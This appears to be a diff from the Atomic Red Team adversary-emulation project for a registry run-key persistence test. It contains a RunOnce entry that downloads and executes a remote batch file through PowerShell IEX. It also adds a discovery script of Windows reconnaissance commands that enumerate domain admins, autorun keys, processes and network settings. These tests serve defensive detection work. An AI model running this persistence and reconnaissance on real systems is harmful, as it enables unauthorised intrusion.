+      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
    cleanup_command: |
      Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
    name: powershell
@@ -106,7 +106,8 @@ atomic_tests:
 - name: Suspicious bat file run from startup Folder
  auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
  description: |
-    bat files can be placed in and executed from the startup folder to maintain persistance.
+    bat files can be placed in and executed from the startup folder to maintain persistance
+    
    Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
@@ -0,0 +1,44 @@
+net user Administrator /domain
+net Accounts
+net localgroup administrators
+net use
+net share
+net group "domain admins" /domain
+net config workstation
+net accounts
+net accounts /domain
+net view
+sc.exe query
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+wmic useraccount list
+wmic useraccount get /ALL
+wmic startup list brief
+wmic share list
+wmic service get name,displayname,pathname,startmode
+wmic process list brief
+wmic process get caption,executablepath,commandline
+wmic qfe get description,installedOn /format:csv
+arp -a
+whoami
+ipconfig /displaydns
+route print
+netsh advfirewall show allprofiles
+systeminfo
+qwinsta
+quser